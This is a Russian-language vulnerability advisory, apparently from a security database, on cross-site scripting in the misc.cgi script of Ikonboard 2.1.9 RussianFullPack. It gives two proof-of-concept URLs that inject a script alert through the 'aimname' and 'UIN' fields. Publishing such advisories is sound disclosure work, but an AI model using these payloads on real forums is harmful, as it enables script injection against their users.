Межсайтовый скриптинг в Ikonboard 2.1.9 RussianFullPack
| Дата публикации: | 14.07.2004 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 2768 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Ikonboard 2.1.9 RussianFullPack
Описание: Уязвимость в Ikonboard позволяет удаленному пользователю выполнить XSS нападение. Уязвимость найдена в скрипте misc.cgi в форуме Ikonboard 2.1.9 RussianFullPack в полях "aimname" и "UIN". Удаленный пользователь может выполнить XSS нападение. Пример/Эксплоит:
http://target/cgi-bin/ikonboard/misc.cgi?action=aim&aimname=<script>javascript:alert('hello')</script>
http://target/cgi-bin/ikonboard/misc.cgi?action=icq&UIN=<script>javascript:alert('hello')</script>
URL производителя: http://www.ikonboard.com Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Уязвимость обнаружил Иван Жданов [dokk21@rambler.ru] |